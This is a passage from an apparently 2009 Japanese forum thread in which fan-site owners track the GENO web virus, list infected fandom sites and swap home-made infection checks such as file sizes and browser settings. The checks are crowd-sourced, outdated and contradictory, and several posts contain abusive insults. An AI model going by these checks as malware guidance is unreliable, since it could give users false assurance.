周りにどんだけ迷惑がかかるか分かってるんだろうか

517 :GENO:2009/05/16(土) 16:35:59 ID:JJXVNcG60
仮○ライ○ーとかで良いんじゃないのか

518 :GENO:2009/05/16(土) 16:36:00 ID:V+9sPLK20
>>509
お前みたいなのは一生PC使わなければ世の為だ

519 :GENO:2009/05/16(土) 16:36:18 ID:VbtPfjcW0
お面ライダーでいいよもう

520 :GENO:2009/05/16(土) 16:36:35 ID:WYkoXAwT0
すいません、UACを有効にできているか確認するにはどうしたらいいでしょうか。

521 :geno:2009/05/16(土) 16:37:02 ID:GfLVqANbO
>>509
JAVA(JAVAアプレット)とJAVAスクリプトの違いも分からん奴はネット繋ぐな

切るのはスクリプトの方だ
タカミンはアプレットだから関係ない
エクスカリバーとエクスカリパーくらい違うわ

522 :GENO:2009/05/16(土) 16:37:39 ID:UhwvWE5p0
感染に気づく→告知だけ残して全ページ削除→今クリーンインスコ中って流れで
感染された告知ページ残してるパターンがあるっぽいな
サイトの方の感染調べられないならいっそ全部消しときゃいいのに

523 :GENO:2009/05/16(土) 16:37:44 ID:ACn1bXTV0
ジャンル報告age
リボーン、プチオンリだけじゃなくて
他のオンリ告知サイトも感染していた。
(5/16の日付でサイト内ファイル削除の対策済)

>>509
アプレットとスクリプトの違いを(ry

524 :GENO:2009/05/16(土) 16:38:33 ID:DNhUE1rp0
初心者だからだの疎いだの言ってる奴はまとめサイト読む能力もないほどクズなの?

525 :GENO:2009/05/16(土) 16:39:12 ID:aftcTZja0
書店スレとかこっちにあった印刷所スレとかメインで見てた人間からすると
幸とかすら何なのか分からないんだが

526 :GENO 報告は名前欄に「報告」入れ推奨:2009/05/16(土) 16:39:42 ID:V9V0BvaO0
報告は名前欄に「報告」入れしたほうが更新しやすいから頼むよ


今北が増えてるから、>>514のWikiのURLも定期的にコピペしてくれ

527 :geno:2009/05/16(土) 16:40:05 ID:m4fTbY+W0
>>499
・sqlsodbc.chmのサイズと更新日時
・cmd.exeとregedit.exeは起動するか
・UACは切ってるのか
以上のこと教えてくれないか

528 :GENO:2009/05/16(土) 16:40:23 ID:NddsKjpSO
同人用語はジャンル内の同人屋だけがわかればいいんじゃないか
同人サイト以外の人も見るサイトに晒されていたくないんだが

529 :GENO:2009/05/16(土) 16:40:40 ID:ZjGJKiW50
>>505
IEが遅いのなら前スレで感染確認できないけどメモリ食うって話は何件か出てた

530 :GENO:2009/05/16(土) 16:40:43 ID:w2e1m/MuO
>>513
ウイルスの蔓延を阻止することより女性向けの妄想ルールが大事なんですね、わかります
だったらスレに引きこもってろよ
呆れてものが言えん
ここでジャンルカミングアウトしたところでお前のサイトが晒されるのかよアホか

531 :GENO:2009/05/16(土) 16:40:50 ID:/ifCeInG0
>>507
対策済みならいいってもんじゃないだろ。
感染時に該当サイトへアクセスした人への注意喚起になるんだから。

532 :GENO:2009/05/16(土) 16:41:19 ID:UzmDldtu0
>>513の追記だけど
一般人向けのGENOウイルスまとめサイトだって別にあるでしょ
特撮のスレでも既に注意喚起の書き込みがあるし
サイト巡っても日記にウイルスのこと書いてる所が沢山あるよ

これでも「感染拡大防いでない」って言うならどうしろっての?

533 :GENO:2009/05/16(土) 16:41:23 ID:ouvbuwBb0
>492
>298を参照してくれ
それと 「開発」とは別に設定→セキュリティでプラグイン・JavaScriptをオフにしていないと無意味。


534 :geno:2009/05/16(土) 16:41:25 ID:wh+11tX1O
何でもかんでも説明しながら話さにゃならんのか
まとめ見れば分かるだろ


535 :GENO:2009/05/16(土) 16:41:33 ID:OmZTJmEN0
>>513
全員が全員伏字知ってるっていう保障もないんだが…
もうだめだこういう奴はジャンルのルール優先で実害の可能性は二の次って

536 :GENO:2009/05/16(土) 16:41:36 ID:rdW8H0F70
sqlsodbc検索しても見つからない俺ビスタンユーザー

537 :GENO 報告は名前欄に「報告」入れ推奨:2009/05/16(土) 16:42:25 ID:V9V0BvaO0
もめてる場合じゃない

538 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:42:25 ID:+hwWCuLO0
取り敢えず感染してない事を確認して
自サイトと運営してるカプサーチに
注意書きとまとめのURLを貼り付けておいた
感染して無くてよかったー

539 :GENO:2009/05/16(土) 16:42:40 ID:STQt++5e0
スレ位ちゃんと目を通せよ

540 :GENO:2009/05/16(土) 16:43:00 ID:qpR5kLaO0
>>525
それは伏せ字関係なくてただの書き方方言だから。
サーバーを「鯖」って書くような類。

541 :GENO:2009/05/16(土) 16:43:11 ID:ouvbuwBb0
>536
ClamWin入れてCドライブ対象スキャン汁

542 :GENO:2009/05/16(土) 16:43:19 ID:JJXVNcG60
もめてるっていうか、一人がギャーギャー騒いでるだけだけどな

543 :GENO:2009/05/16(土) 16:43:26 ID:0SRcTPiU0
まとめサイト見ても分からない事がある人はサイト管理人向いてないから
今サイト持ってるならさっさと全消しして閉鎖してきた方がいい。そして回線切れ。
サイト持ってない奴はとりあえず回線切れ。

544 :2:2009/05/16(土) 16:46:05 ID:n/uQJHr/0
>>449「隠の王」はカテゴリどこスか
>>454 >>482 >>523は追加しました

545 :GENO:2009/05/16(土) 16:46:45 ID:sCtorif20
sqlsodbc.chm 1.29 KB (1,323 バイト) 更新日時:2008年4月14日
MD5:6a690f7672c05acc29eaf7c31b33fb80
SHA-1:d530864c4c7a96493d982d4b1c0e4311fa461cfb

cmd.exeとregedit.exeは問題なく起動
avastスキャン、ブート検査異常なし
再起動も正常にできたがsqlsodbcのサイズが引っかかる…

546 :GENO:2009/05/16(土) 16:47:13 ID:+bxNWFSA0
同人用語だの伏字だの使いたいとか言ってるアホは何なんだ

感染ジャンルにうっかり行く可能性のあるやつがジャンル者だけに限らないことぐらい考えたら分かるだろ
一般人からは検索避けされてるとか行ってるけど、
オタの中には感染を知らないでサーチだのから新しく飛ぶ奴もいるだろうが

何で伏字が必要なのかっていう意味考えろ、今回の件では何の意味もない
自分だけがいいなら関係ないとかいってんなカス
ジャンル自己申告して周知に走り回ってる奴もいるんだぞ、いい加減にしろ

547 :GENO:2009/05/16(土) 16:47:15 ID:qEGkliVn0
感染サイト確認

ガンダム種 アスキラ小説
メールしたけどまだ反応なし

548 :GENO:2009/05/16(土) 16:47:27 ID:ggzTlIag0
>>505と同じで色々試してみて検出なしだったんだが
動作が重い。
ここ数日「メモリが足りません。仮想メモリの数値を増やしてます」の
ポップアップが何度か出てる。

549 :geno:2009/05/16(土) 16:47:36 ID:sfcpFjSkO
なんかもう潮時なんじゃないかと思えてきた
色々と

550 :GENO:2009/05/16(土) 16:48:00 ID:uy8wj/XV0
>>532
お前はもう黙ってろ

回線きって氏ね

551 :GENO:2009/05/16(土) 16:48:06 ID:mVO5oSsk0
全然伏せ字わからんようなジャンルには行かないでしょ、そもそも
わざわざウィルス探しにでも行かない限り
併設されてるとこは書いてあるから、ある程度わかればいいよ
所詮同人板のまとめなんだから

552 :GENO:2009/05/16(土) 16:48:18 ID:vdqvVnja0
>>2
「隠の王」は少年誌(その他)でよかったはず

553 :GENO:2009/05/16(土) 16:48:22 ID:VbtPfjcW0
>>548
それはただ単にメモリ不足なだけだろ…

554 :チラシ:2009/05/16(土) 16:48:57 ID:sAiJqBv30
これを期に閉鎖するか…感染してないけど

555 :GENO:2009/05/16(土) 16:49:06 ID:D3ulnLAr0
>>544
少年漫画その他じゃないか
確かスクエニ系で連載してたと思う

556 :GENO:2009/05/16(土) 16:49:10 ID:vYYHaPyHP
ビスタ使いだけどIE8にした方が安全なのかな?

557 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:49:36 ID:NCQvc8VZ0
オンラインスキャンしたが、ロックがかかってスキャンできてないシステム
が多くて感染してないのかわかんね・・・・

558 :GENO:2009/05/16(土) 16:49:36 ID:uy8wj/XV0
>>551
わざわざID変えてご苦労様です
もう来んな
お前みたいなのがいるから爆発的に感染が広がってくんだよ

559 :Geno:2009/05/16(土) 16:50:00 ID:gTmV5S+lO
とりあえずこの土日は一切ネサフしないとして
どれくらいで収まるんだろうこの騒動
終わりが見えないな…

560 :GENO:2009/05/16(土) 16:50:08 ID:Wc8Cd3VC0
>>532
>一般人向けのGENOウイルスまとめサイトだって別にあるでしょ
ネット見るの怖いから検索してないけどあるの?
一般の会社で感染してるところ小林製薬以外にも載ってる?

561 :GENO:2009/05/16(土) 16:50:12 ID:SdXMuhFV0
>>507
対策済みって書いてあるのにまた改ざんされてるサイトもある
おそらくパスの類を変えてないか対処が中途半端

562 :GENO:2009/05/16(土) 16:50:16 ID:5dy38PGO0
>>550
一字一句同意

563 :GENO:2009/05/16(土) 16:50:20 ID:RwVE/EfH0
>>544
漫画ですけどアニメ化もされてます
主に女子に人気です

564 :GENO:2009/05/16(土) 16:50:27 ID:sAiJqBv30
名前欄間違えた ついでに喚起age

565 :GENO:2009/05/16(土) 16:50:44 ID:k7S1lClv0
自ジャンルのドエロサイト守るのに必死な人が居ますね

566 :GENO:2009/05/16(土) 16:50:48 ID:Kjda8wrMO
携帯からでごめん。
アバストが激怒したので報告。
黒執事同人サイト1件
(生)KAT-TUN同人サイト1件
(生)NEWS同人サイト1件

共にテキストサイトでした。


567 :GENO:2009/05/16(土) 16:51:09 ID:NddsKjpSO
えっちな動画は見たらすぐ消せよ

568 :geno:2009/05/16(土) 16:51:11 ID:wh+11tX1O
いや、ここでのレスにまで伏せがわからんとかはなあ
まとめに伏せが無ければそれでいいんでは

あとは一般向けのまとめサイトさんへの誘導を
トップの分かりやすい位置にするとか

569 :ゲノ:2009/05/16(土) 16:51:17 ID:w2e1m/MuO
>>532
ここにジャンル書かれたくらいでジャンル収束しないよ
大体スレのローカルルールを別のスレに押し付けるのはやめれ
今は非常事態なんだからあまり強硬に伏せ字強要する方が痛いジャンル扱いされるよ
あんたの言い分聞いてると自分のジャンルさえ無事なら他はどうでもいいとしか聞こえないんだよ
自重しろ

570 :GENO:2009/05/16(土) 16:51:20 ID:yicyznBmO
>>556
IE7よりは
でも火狐のほうがまだ安全みたい

571 :GENO:2009/05/16(土) 16:51:25 ID:C8HCbW1M0
>>545
どんまい
アウトだよそれ

572 :GENO:2009/05/16(土) 16:52:02 ID:5qGyw+II0
>>545
はいアウトー

573 :GENO:2009/05/16(土) 16:52:25 ID:r5vGNU7N0
馬鹿な質問してごめんなんだけど
まとめwikiって感染しないの?

574 :GENO:2009/05/16(土) 16:52:35 ID:19cWedGn0
>>545
もう上の一行の時点でアウトだな

575 :geno:2009/05/16(土) 16:52:50 ID:ERydDJZg0
あー、とうとう半ナマだけでなくナマにも感染きたのか…。
すごい勢いだなぁ…。

576 :GENO:2009/05/16(土) 16:53:25 ID:TV+NV+ev0
>>552-555
Gファンタジーだから女性向けなんじゃないか?

577 :GENO:2009/05/16(土) 16:53:29 ID:O9rS52fBO
>>536
C→Windows→Help→mui→0409か0411或いは両方の中にある。
探せ。

578 :GENO:2009/05/16(土) 16:53:33 ID:UdYRnt/i0
>>546
お言葉だけど、感染を知らずにサーチなどから飛んでしまう人にとって
まとめサイトにそのジャンルが正式名称で表記されてようが伏字表記
されていようが、あんまり関係ないことだと思うな…。

ここまで来ればどのジャンルが安全てこともないんだし
全ジャンルの人間が全ジャンル警戒して対策しなきゃ。

579 :GENO:2009/05/16(土) 16:53:45 ID:f4xOymFE0
Vistaの場合 sqlsodbc.chm は
 C:\Windows\Help\mui\0409
 C:\Windows\Help\mui\0411
このどちらか、あるいは両方のディレクトリの中に sqlsodbc.chm があります。
sqlsodbc.chm を右クリック→プロパティでボリュームが確認できますので、
そこが 50,727 bytes なら正常です。

これなんだけど、49.5kってことは感染?

580 :GENO:2009/05/16(土) 16:53:49 ID:fiQ+DgIMO
>>545
明らかにアウトでしょ

581 :GENO:2009/05/16(土) 16:54:03 ID:0gd0aS7nO
携帯から報告失礼します。
デビルメイクライで二次サイトを運営していた者です。

本日昼過ぎ、自サイトのソースを確認しましたら、
ソース下部に怪しいJAVAスクリプトが埋まっているのを発見しました。
なんだか怖くなって即全ページを削除。現在、閲覧できないようにしてあります。

デビルメイクライでサイト運営中の方、またサイト巡りをしてらっしゃる方、
急いでPCの感染チェックをおねがいします。

ちなみに>>10の判定方法では私のPCは白でしたが、怖くて堪らない。
おとなしくクリアインスコするべきなのかもしれないorz


582 :geno:2009/05/16(土) 16:54:45 ID:5qGyw+II0
>>579
プロパティ見ろと

583 :GENO:2009/05/16(土) 16:54:54 ID:58PrCe2G0
>>579
右クリしてプロパティで見たらいい

584 :GENO:2009/05/16(土) 16:55:00 ID:t9Z/eiyL0
>>579
右クリックでプロパティ見てみたら50,727って表示されてると思う

585 :GENO:2009/05/16(土) 16:55:15 ID:mVO5oSsk0
>>558
いやー未感染のPCの電源落としてるから感染させようがないわw
残念でしたww

586 :GENO:2009/05/16(土) 16:55:27 ID:lapl18Rv0
>568
いやだからここに報告する際に伏字使われてると
ジャンルの正式名称が分からなくてまとめに載せられねって事だろ
同人板にいればジャンルの伏字全て知ってて当たり前なの?
違うだろ

587 :GENO:2009/05/16(土) 16:55:38 ID:vdqvVnja0
>>579
49.5kbyte(50,727byte)ってでてない?

ていうか何度も出てるから、いい加減その辺はまとめを読んでほしい。
焦るのはわかるんだけどね。

588 :GENO:2009/05/16(土) 16:55:56 ID:JLSn9lA+0
>>581
もしFC2だったなら広告かも
FC2.comみたいなのが下部に表示されてたはず

589 :GENO:2009/05/16(土) 16:56:00 ID:C9j9Rqzn0
そもそも同人サイトじゃないんだから伏せる必要がないと思うんだが

あとここで感染したかもおおこわいこわいとか言ってる奴は
黙ってクリーンインスコしろ
あとは回線切って別に死ななくてもいいから
一週間くらいローカルだけ見てろ

ここで騒いだって「大丈夫だよ^^」って言ってくれる人はいませんよ


590 :GENO:2009/05/16(土) 16:56:01 ID:O9rS52fBO
>>579
正常
ポインタ載っけただけでなくちゃんとプロパティ確認汁

591 :GENO:2009/05/16(土) 16:56:06 ID:QYd4/Tip0
感染を確認したテイルズサイト、管理人さん反応がないのですが
登録してある幸管に報告してもいいのかな?

592 :GENO:2009/05/16(土) 16:56:25 ID:Igiym4Mv0
どこのバカだよ!こんな危険なウイルス開発したヤツ

593 :GENO:2009/05/16(土) 16:56:39 ID:fROCRAiV0
>>579
1kbは1000byteではない

594 :げの:2009/05/16(土) 16:57:12 ID:xF88a00E0
>>579
ちゃんと右クリしてプロパティまで見て言ってる?

595 :GENO:2009/05/16(土) 16:57:18 ID:hfwINpmY0
>>560
一般用のまとめサイトもあるよ。
自分は同人用のまとめwikiにリンク貼ったけど
同人用の方が初心者向けっぽく感じたから

で、wikiの平成バイク乗りって訂正するの?

596 :GENO:2009/05/16(土) 16:57:19 ID:cc9p3OGy0
>>2
「隠の王」は本屋では青年漫画と同じくくり

597 :00:2009/05/16(土) 16:57:22 ID:JJXVNcG60
>>591
そのほうが良いかもしれんね
幸でそのサイトクリックしたらウイルス感染とか、閲覧者がかわいそすぎる


598 :geno:2009/05/16(土) 16:58:07 ID:hb1IPxRg0
同人じゃないまとめサイトは
セキュ板の1にwikiが貼ってある
http://pc11.2ch.net/test/read.cgi/sec/1242415108/

ただこれは誰でも編集可なのでばんばん貼るのはためらわれる

599 :GENO:2009/05/16(土) 16:58:18 ID:SdXMuhFV0
>>581
広告とかじゃないの?
普通はHEADとBODYの間に埋め込まれることが多いからソース下部ではあまり見ないんだが
スクリプトがどんなのだったか覚えてる?


600 :geno:2009/05/16(土) 16:58:49 ID:K4FcrDRq0
98だと
sqlsodbc.chmはWindowsのSystemの中にある
cmd.exe、regedit.exeが立ち上がるかどうかは
ファイル名を指定して実行で
「command.com」「regedit.exe」を入力する

当方詳しい訳ではないのでミスあったら
指摘お願いします



601 :GENO:2009/05/16(土) 16:58:57 ID:ZLlUDLbH0
>>581
今まで報告のあるものは</HEAD>と<BODY>の間じゃなかったか
下部なら広告タグなんじゃないの
そんなのも見分けられない奴が多くてびっくりしてる

602 :geno:2009/05/16(土) 16:59:09 ID:sfcpFjSkO
>>576
一応少年誌扱い
女性読者は圧倒的に多いけど

603 :GENO:2009/05/16(土) 16:59:23 ID:RS4CmXKuO
ニコニコとか感染しねえのかな

604 :GENO:2009/05/16(土) 16:59:23 ID:A9qSW+uH0
もーどっかに無料レンタル鯖の広告と
GENOの違いも貼っといたほうがいいんじゃないか

605 :geno:2009/05/16(土) 16:59:27 ID:5qGyw+II0
いい加減、1kB=1000Bで1kiB=1024Bと言う事をみんな覚えてくれ

606 :GENO:2009/05/16(土) 16:59:52 ID:0gd0aS7nO
了解。今すぐクリーンします。


607 :GENO:2009/05/16(土) 16:59:54 ID:Qyk8RTLY0
>>581
ソース下部だと、FC2とかの広告用のjavaScriptとかのような気もしますが
無料スペースとかではなく?

608 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:00:19 ID:Se14JChw0
まあ怖いなと思ってる人はクリンインスコしたほうがいいかもね
PC軽くなるしいい機会だと思えば

609 :GENO:2009/05/16(土) 17:01:20 ID:0OvXD4cM0
wikiで創作同人ゲームサイトが(男性向け)となってたけど
女性向けでも感染確認されてます

610 :GENO:2009/05/16(土) 17:01:30 ID:R7YgqUvm0
まとめサイト来た時点以降ネットで新規開拓しないで自分のPCチェックすれば
正直ジャンル名が伏せてあろうと伏せてなかろうとどうでもいい話。
というかもうジャンル名いらなくね?どこでもまんべんなくじゃないか?

611 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:01:43 ID:bmeWatfA0
>>601
自分が管理してるサイトのjsくらいわかっとけよと思うよな。
アホ大杉。サイトなんかやめてしまえ。



612 :GENO:2009/05/16(土) 17:02:02 ID:Wc8Cd3VC0
>>592
>>94
怖くて踏んでないから何が書いてあるのか分からないけど
海外から来たウイルスだそうです

613 :536:2009/05/16(土) 17:02:33 ID:rdW8H0F70
おk、ファイルたどったら見つかった。吃驚させて済まんす。

>>579と同じく49.5KBなんだけど大丈夫かな

614 :GENO:2009/05/16(土) 17:02:53 ID:Twq95x0L0
火狐ユーザーなんだけどニフティのウイルスチェックはIEのみってなってるんだけど
火狐でも出来るとこってあるの?
IE立ち上げたくない・・・
どなたか誘導よろしくお願いします

615 :GENO:2009/05/16(土) 17:02:57 ID:6bR02nkA0
>>585
死ね

>>2もろくに見ないで馬鹿な質問してくる奴は何なの?
「大丈夫ですよ^^」って言って欲しいのか?
不安なのは皆同じなんだよ。
「初心者ですみません」「無知ですみません」と言えば許されると思ってんのか

616 :GENO:2009/05/16(土) 17:02:58 ID:A9qSW+uH0
まあ広告タグもわからんなら何か他のものにも
感染してるかも知れんしクリインスコでいいかも知れんな
つかマジでサイト作るなよその知識で

617 :GENO:2009/05/16(土) 17:03:05 ID:Wc8Cd3VC0
>>598
ありがとう見てくる

618 :GENO:2009/05/16(土) 17:03:29 ID:rdW8H0F70
>>613は忘れておくれ

619 :geno:2009/05/16(土) 17:03:32 ID:4HsgFFZ10
>>421
同人板ていうか同人サイトの男女比率考えれば当然


620 :GENO:2009/05/16(土) 17:03:42 ID:QYd4/Tip0
>>597
一応今報告メール出しときました
ジャンル者の方は気を付けて下さい

621 :GENO:2009/05/16(土) 17:03:42 ID:Gh3ZB53n0
同人サイトなどへの感染例が報告されたジャンル一覧。サーチや情報サイトなど閲覧者多数サイト感染による被害の爆発的拡大が予測される場合、特に()内に記載。

■アニメ系
エヴァ(小説サーチ) / 忍たま乱太郎 / プリキュア / 天体戦士サンレッド / コードギアス / レッツ&ゴー / イナズマイレブン
ガンダム:SEED、00 /

■少年漫画【週刊飛翔系】
リボーン(オンリー+プチオンリー告知サイト・ファンサイト) / テニミュ(ファンサイト) / ジョジョの奇妙な冒険 / ワンピース /
デスノート / D.Gray-man / 遊戯王無印
■少年漫画【Gファンタジーなど少年ガンガン系、小学館、その他】
鋼の錬金術師(オンリー告知サイト) / 隠の王 / 黒執事 / コナン
■青年漫画
ヘタリア (PC鯖使用の携帯向け同盟)/ おお振り(アンソロ告知サイト) / 福本:越境、銀金

■ゲーム【RPG、ACT】
幻想水滸伝 / 戦国BASARA(アンソロ告知サイト) / 戦国無双 / バイオハザード / セブンスドラゴン
メガテン:真、サマナー、ライドウ、P4 / テイルズオブ:ジアビス
■ゲーム【乙女、BL、男性向け】
Vitamin / 遙かなる時空の中で / Starry☆Sky / クインロゼ / 薄桜鬼 / 金色のコルダ
ニトロプラスキラル:咎狗(アンソロ告知サイト)、sweet pool /
Fate / ひぐらし
■ゲーム【アーケード、シューティング、格闘、その他】
ポップンミュージック / ビートマニアUDX / 東方 (超大手感染情報) / ブレイブルー /

■小説・ライトノベル - 小野不由美(サーチ)
■創作 - 創作小説 / 男性向け創作同人ゲーム / 女性向け創作同人ゲーム / オリJUNE
■特撮 - 仮○ライ○ー電凹 ※生モノ伏字、凹=王※
■生モノ - ジャニーズ:K○T-TUN、N○WS>>566
■その他の接触確率の高そうな報告例
非同人系ゲーム同盟サイト / 模型イベントホビーコンプレックス告知サイト

このスレで報告されてる以外の新規、ゲームBLニトロプラスキラルに「sweet pool」

622 :GENO:2009/05/16(土) 17:04:03 ID:ANvAlVha0
自分のメインジャンルで登録しているサーチにURLつきで連絡してみたよ。
なにせメジャータイトル故サイト持ちの年齢層が幅広くておっかないんだ。
自分のサイトにも記事やまとめサイトへの誘導記事載せた。
ネラー認定されても被害が拡大してジャンルが廃れるよりマシだよな。



623 :Geno:2009/05/16(土) 17:04:06 ID:gTmV5S+lO
>>613
なぜスレを読まない

624 :GENO:2009/05/16(土) 17:04:27 ID:GfLVqANbO
>>614
まとめ見てこい
IEタブぶちこめば見れる

625 :GENO:2009/05/16(土) 17:04:33 ID:dUhoo+Zw0
>>610

でもみんな「自分は大丈夫、決まったサイトしか見ないし」って思ってるから
ジャンル名出した方が身近な印象与えられるとは思うんだ

まあ逆に「自分のトコは無いから大丈夫」って思って安心する人が出る可能性もあるけどさ

626 :geno:2009/05/16(土) 17:04:53 ID:t+UZlBwU0
firefox使ってるんですが、IEとfirefoxでjavaスクリプトのバージョンが違うのを
確認するのにはどうすれば良いのでしょうか?
IEとfirefoxでバージョンが違っていた場合、両方とも新しくするにはどうすれば
良いのでしょうか?
firefoxでjavaの最新版ダウンロード→インストールはしてあります。
IEでも同じ様にjavaスクリプトの最新版をダウンロードしないといけないのでしょうか?

627 :geno:2009/05/16(土) 17:04:53 ID:sfcpFjSkO
>>610
ジャンル名あったほうが自分に近く感じて
危機感もちょっとは持つんじゃないの
これだけ広がってるって目安にもなるし

628 :GENO:2009/05/16(土) 17:05:13 ID:U9B3yCv70
>>615
伏せ字が必要かどうかは別としてお前もいい加減痛い。
あと通報しときました。

629 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:05:48 ID:3fZWJBYR0
質問です
XP使用でウィルスバスター2009を使用中
さっき定義手動更新して全体スキャンではなにも出ません

1のsqlsodbc.chm容量確認しようとすると
「ドライブCのボリュームラベルがありません
C:\WINDOWS\system32のディレクトリ
ファイルが見つかりません」と出ます
実際sqlsodbc.chmはあり、プロパティを確認すると
サイズ49.5KB(50,727バイト)
ディスク上のサイズ52KB(53,248バイト)
更新日時2004年8月5日
になってました

アウトなんでしょうか?


630 :GENO:2009/05/16(土) 17:07:15 ID:RwVE/EfH0
>>613
だからプロパティ見てくれと579がなんども言われてるから

631 :2:2009/05/16(土) 17:07:55 ID:n/uQJHr/0
>>2の者です

まとめに載せるジャンル名の伏字について
色々考えたんですが、ここに載せることでジャンルが被る被害があるとすれば
【同人サイトがあるようだ、という推測の根拠となる】くらいではないかと思います
しかしそれは2ちゃんのスレやコミケのジャンルコードなどでも同じことですので、
基本【伏字は解除】して掲載します
自分が知らないジャンルはそのまま転載するので、適宜指摘してください
今後、この件について何かあればWikiから直接自分へ連絡をお願いします

632 :Geno:2009/05/16(土) 17:08:15 ID:gTmV5S+lO
アウトか否かの判断を委ねる人多いけど
わからないなら再起動してみればいいのではないのか?

633 :GENO:2009/05/16(土) 17:09:00 ID:jTfkUc7xP
ソースのそのまま貼っちゃってごめんね
感染サイトはこんな感じになってるよ
http://www.dotup.org/uploda/www.dotup.org33103.jpg

634 :GENO:2009/05/16(土) 17:09:01 ID:iv1sZAO40
PS3とかPSPはネサフしても大丈夫なんですか?

635 :geno:2009/05/16(土) 17:09:05 ID:fsWEj42p0
>>629
スレ内もしくはまとめwikiに答えがあります

636 :GENO:2009/05/16(土) 17:09:09 ID:6bR02nkA0
>>629
再起動すればいいんじゃない

637 :GENO:2009/05/16(土) 17:09:30 ID:sAiJqBv30
>>629
【cmd.exe、regedit.exeが立ち上がるかどうか】
も確認せよ

638 :GENO:2009/05/16(土) 17:09:34 ID:BfrfM/sk0
今北産業の人へドゾー

同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/

セキュ板本スレ
GENOウイルススレ ★5(実質6)
ttp://pc11.2ch.net/test/read.cgi/sec/1242415108/

639 :GENO:2009/05/16(土) 17:10:37 ID:U/iBpvAZ0
>>625
後者の方が多い気がするよ…
つーかマイミクがそうだよorz

あと聞きたいんだが感染してないPCの電源落としてても感染すんの?
615の沸騰ぶりにちょっと疑問に思ってる。

640 :GENO:2009/05/16(土) 17:10:55 ID:02OBQUod0
ブログの感染って報告されてるか?

641 :GENO:2009/05/16(土) 17:11:14 ID:MhuJZGR90
とりあえずもうジャンルはいいんじゃないか
ここまで広がっちゃってるんだし

漫画から多ジャンルのアニメ、ゲーム、果てはナマモノのジャンルまで感染が広がっています
他人事と思わず小さいジャンルであろうと、どのジャンルでも注意してください
とかでさ

642 :G:2009/05/16(土) 17:11:17 ID:ZLwS0etV0
>>545
現状亜種というより以前の物と替わってきているので・・・OSはなに?

643 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:11:22 ID:A9qSW+uH0
>>639


644 :GENO:2009/05/16(土) 17:11:53 ID:fK6yapaL0
まとめに書いてあることまんま聞いてくる人がザクザク増えてきた…

645 :GENO:2009/05/16(土) 17:12:42 ID:fROCRAiV0
>>631
乙です

646 :GENO:2009/05/16(土) 17:12:43 ID:zlsW0HIw0
>>626
確認するのはJSのヴァージョンじゃない
AdobeFlashとReaderのヴァージョン
JSの遮断はNoScriptというアドオンを入れるか、
ツール→オプションでJavaScriptを有効にするのチェックを外すかする
それとabout:congigで設定変更
このスレをaboutで検索してその設定に従ってくれ

647 :GENO:2009/05/16(土) 17:13:03 ID:cN6MMg830
>>641
個人サイトはともかく、サーチやアンソロ告知サイトは
ジャンル込みで載せておくべきだと思う。

648 :GENO:2009/05/16(土) 17:13:43 ID:NddsKjpSO
>>633
電話のデータフォルダーに保存して、見ようと思ったらjpgになってなかった
よくわからん拡張子だから棄てたんだが何これ

649 :GENO:2009/05/16(土) 17:13:50 ID:DPZkMYON0
>>640
FC2での感染が報告されてたはず。

650 :G:2009/05/16(土) 17:13:55 ID:ZLwS0etV0
>>644
それは前スレとかでも言われてたことだし、
下手にリンクをクリックできない
って思っているんじゃないかな?

651 :GENO:2009/05/16(土) 17:14:44 ID:lapl18Rv0
>633
うわ、これはソース見たら一発で分かるね

>640
報告はあるにはあったけど少数(というかfc2の1件だけ?)
細く情報もなく信憑性は微妙

652 :629:2009/05/16(土) 17:14:50 ID:3fZWJBYR0
再起動は問題なかったのですが検索サイト運営しているので
万が一にも感染していたら怖いなと思ってます
現在自分のサイトに怪しいジャバスクリプトはありません

>>637
立ち上がります

653 :GENO:2009/05/16(土) 17:15:08 ID:6bR02nkA0
>>640
ブログも危ない

654 :GENO:2009/05/16(土) 17:15:14 ID:fksVrn0p0
>>621
伏せたりしないんだったら週刊少年飛翔系も
週刊少年ジャンプ系にした方が良くないか?

あとヘタリアは同盟サイト以外に
普通の女性向けサイトも感染してた

655 :GENO:2009/05/16(土) 17:15:16 ID:ltuX6AYO0
【牧場経営】牧場物語同人 五年目【恋愛】
http://changi.2ch.net/test/read.cgi/doujin/1236755911/

269 名前:牧場[sage] 投稿日:2009/05/16(土) 11:06:16 ID:EdZMGbM1O
うちアバスト使いだから感知できたんだけど、よろずメインで少し牧場もやってるサイトが
どうやら感染してるっぽい
(GENOかははっきりとはわからないがまとめサイトみた感じだと
該当ジャンル幸使ってるっぽいし感染の可能性が高い)
一応連絡はしたんだけど他に被害がでてないか心配
サブジャンルだからか幸に登録してないとこだからよかったけど、
今別ジャンルの幸も結構感染してるらしいな
管理人さんも閲も気をつけてね

270 名前:牧場[sage] 投稿日:2009/05/16(土) 13:22:24 ID:yIH9S1az0
それ、GENOスレに報告した方がいいかも知れない

271 名前:牧場[sage] 投稿日:2009/05/16(土) 15:19:04 ID:EdZMGbM1O
というかそのスレですでに報告があったジャンルがメインなとこだからなー
とりあえず行ってくる


656 :デジ:2009/05/16(土) 17:16:05 ID:NoC9xktr0
スレ見てチェックして見たが問題無かった。

だいぶ前に同人サークルサイト幾つか見てたら、いつの間にか
スパイウエアに感染していた事があって、それ以来見なくなっていたのが幸いしたか。

657 :GENO:2009/05/16(土) 17:17:21 ID:7q1bHyUp0
まとめサイトに書いてあることについてはまとめ読めでいいんじゃない?

658 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:17:56 ID:9TCJkftg0
まとめサイトは感染してないよね?

659 :GENO:2009/05/16(土) 17:18:07 ID:ERydDJZg0
あ、ブログも危ないのか。
サイトもPCも感染してなかったのだが、ブログも危ないのなら
ブログへのリンクは切っておいたほうが無難か?

660 :GENO:2009/05/16(土) 17:18:12 ID:ouvbuwBb0
>295でカスペルスキー2009がAdobe Acrobat Reader自体を脆弱性対象認定
当方カスペ7だけど同様に脆弱性ありとして隔離された

クリーンインストする人はしばらくAcrobatのインストールを控えて。

661 :げの:2009/05/16(土) 17:18:30 ID:beMfHRDVO
ジャンル名は必要だと思う
PCに疎い層は具体的で差し迫る危険がないと動かない
自分と自分の見てるジャンルがないから安心なんて層、
この勢いじゃすぐ消えるだろ

